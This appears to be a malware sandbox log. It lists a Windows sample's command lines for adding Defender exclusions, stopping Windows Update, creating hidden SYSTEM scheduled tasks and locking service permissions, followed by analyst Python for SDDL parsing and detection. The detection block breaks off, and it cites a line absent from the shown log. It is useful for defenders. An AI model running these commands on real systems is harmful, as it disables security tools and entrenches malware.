C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t 
REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkUCcFcjT" /SC once /ST 03:10:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkUCcFcjT"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkUCcFcjT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "AtBWxWZQPczPtNlnn" /SC once /ST 15:25:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe\" nf /Zssite_idqtN 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "AtBWxWZQPczPtNlnn"

C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe

C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe nf /Zssite_idqtN 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bSTfouYtWkypYZNMeg"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KcvIfpBEU\DsPYJr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tPKRaMnTrSPPzpw" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "tPKRaMnTrSPPzpw2" /F /xml "C:\Program Files (x86)\KcvIfpBEU\YCgwUJq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "tPKRaMnTrSPPzpw"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "tPKRaMnTrSPPzpw"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "adfRLMJfxNTLtT" /F /xml "C:\Program Files (x86)\AtBFliYUSCIU2\dROlsqs.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KDnJrqmubUqQR2" /F /xml "C:\ProgramData\aFeOAQnlubilNTVB\SxVWXHC.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QrnxlXQtqLuhZDTpp2" /F /xml "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\uytAyRN.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "frJpXGSvGdttwfSkGFg2" /F /xml "C:\Program Files (x86)\OFVgegHnELnCC\DdLstpe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GZVqxQnXgrdNzWCPM" /SC once /ST 06:51:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll\",#1 /aqsite_idmwH 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GZVqxQnXgrdNzWCPM"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll",#1 /aqsite_idmwH 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll",#1 /aqsite_idmwH 385118

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GZVqxQnXgrdNzWCPM"

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\sc.exe

sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "AtBWxWZQPczPtNlnn"

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
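
What the two sc sdset calls above do, as an added analyst example (this code is not part of the sandbox report): it parses the service security descriptor the sample writes for WmiPrvSE and for its own WinDefender service and diffs it against a baseline. In the DACL, the Administrators allow ACE (A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA) no longer carries WP or DT, and (D;;WPDT;;;BA) denies them explicitly, so members of Administrators can neither stop nor pause the service while Local System keeps full control. The DEFAULT_SDDL baseline is an assumption (the descriptor a newly created service gets on a stock Windows 10 host; confirm with sc sdshow on your own reference machine). Note the name: the WinDefender service backed by C:\Windows\windefender.exe imitates the real Microsoft Defender service, which is WinDefend.

```python
from __future__ import annotations

import re

# Descriptor exactly as the sample passes it to "sc sdset" for WmiPrvSE and for its own
# WinDefender service (copied from the process list above).
MALWARE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

# Assumed baseline: the descriptor the SCM gives a newly created service on a stock
# Windows 10 host. Confirm against your own reference machine with "sc sdshow <service>".
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

# Two-letter SDDL access codes as they apply to service objects.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG", "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS", "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
TRUSTEES = {"SY": "Local System", "BA": "Builtin Administrators", "IU": "Interactive users",
            "SU": "Service logon users", "WD": "Everyone"}
# (type;flags;rights;;;sid): the two empty fields are the object/inherit GUIDs.
ACE_RE = re.compile(r"\((\w+);(\w*);(\w*);;;(\w+)\)")


def parse_sddl(sddl: str) -> dict[str, list[dict]]:
    """Split 'D:...S:...' into DACL and SACL ACE lists; rights come back as 2-letter codes."""
    m = re.fullmatch(r"D:((?:\([^)]*\))*)(?:S:((?:\([^)]*\))*))?", sddl)
    if not m:
        raise ValueError(f"not a service SDDL string: {sddl!r}")

    def aces(part: str | None) -> list[dict]:
        return [{"type": t, "flags": f, "trustee": sid,
                 "rights": [r[i:i + 2] for i in range(0, len(r), 2)]}
                for t, f, r, sid in ACE_RE.findall(part or "")]

    return {"dacl": aces(m.group(1)), "sacl": aces(m.group(2))}


def effective_rights(sddl: str) -> dict[str, set[str]]:
    """Per-trustee allow minus deny over the DACL. Simplification: group nesting and ACE
    ordering are ignored; for this descriptor the result matches what Windows enforces."""
    allowed: dict[str, set[str]] = {}
    denied: dict[str, set[str]] = {}
    for ace in parse_sddl(sddl)["dacl"]:
        bucket = {"A": allowed, "D": denied}.get(ace["type"])
        if bucket is not None:
            bucket.setdefault(ace["trustee"], set()).update(ace["rights"])
    return {t: allowed.get(t, set()) - denied.get(t, set()) for t in allowed.keys() | denied.keys()}


def lost_rights(before: str, after: str) -> dict[str, list[str]]:
    """Rights each trustee had under `before` but no longer has under `after`."""
    b, a = effective_rights(before), effective_rights(after)
    return {t: sorted(b[t] - a.get(t, set())) for t in b if b[t] - a.get(t, set())}


def describe_denies(sddl: str) -> list[str]:
    """The explicit deny ACEs spelled out; the first thing to read in a tampered descriptor."""
    return [f"{TRUSTEES.get(a['trustee'], a['trustee'])} denied "
            + ", ".join(SERVICE_RIGHTS.get(r, r) for r in a["rights"])
            for a in parse_sddl(sddl)["dacl"] if a["type"] == "D"]


if __name__ == "__main__":
    for line in describe_denies(MALWARE_SDDL):
        print(line)
    for trustee, rights in lost_rights(DEFAULT_SDDL, MALWARE_SDDL).items():
        print(f"{TRUSTEES[trustee]} lost: {', '.join(SERVICE_RIGHTS[r] for r in rights)}")
    print("Administrators keep WRITE_DAC:", "WD" in effective_rights(MALWARE_SDDL)["BA"])
```

Administrators keep WD (WRITE_DAC) under the tampered descriptor, so a responder can put the baseline back with sc sdset and then stop the service; the lockout slows cleanup rather than preventing it. An sc.exe sdset command line is rare in legitimate administration and is a high-signal detection on its own.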

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam
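
The command lines above, run through a detection pass. This is an added example (analyst tooling, not part of the sandbox report): it tags Defender policy tampering (ThreatIDDefaultAction set to 6, which tells Defender to allow the listed threat ID; exclusion paths written under the Policies key; the SpyNetReporting deletion; the Add-MpPreference exclusion), the inbound firewall allow for C:\Windows\rss\csrss.exe, the stop of the five Windows Update services, the powercfg sleep disables, scheduled tasks created as SYSTEM or with /RL HIGHEST, and decodes the -EncodedCommand argument (base64 over UTF-16LE). The sample lines are copied from the process list; the tag names, the regexes and the helper names are the example's own.

```python
from __future__ import annotations

import base64
import re

# Command lines copied from the process list above, one per technique, plus one
# harmless line (timeout) so the classifier's silence on it can be checked too.
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc',
    r'powercfg /x -standby-timeout-ac 0',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KcvIfpBEU\DsPYJr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tPKRaMnTrSPPzpw" /V1 /F',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'timeout /t 5',
]

# Windows Update delivery chain: Update Orchestrator, WaaS Medic, Windows Update, BITS, Delivery Optimization.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
ALLOW_CODE = "6"  # ThreatIDDefaultAction value 6 = Allow: Defender takes no action on that threat ID

THREAT_RE = re.compile(r'ThreatIDDefaultAction[\\"]*\s+/f\s+/v\s+[\\"]*(\d+)[\\"]*\s+/t\s+REG_SZ\s+/d\s+[\\"]*(\d+)', re.I)
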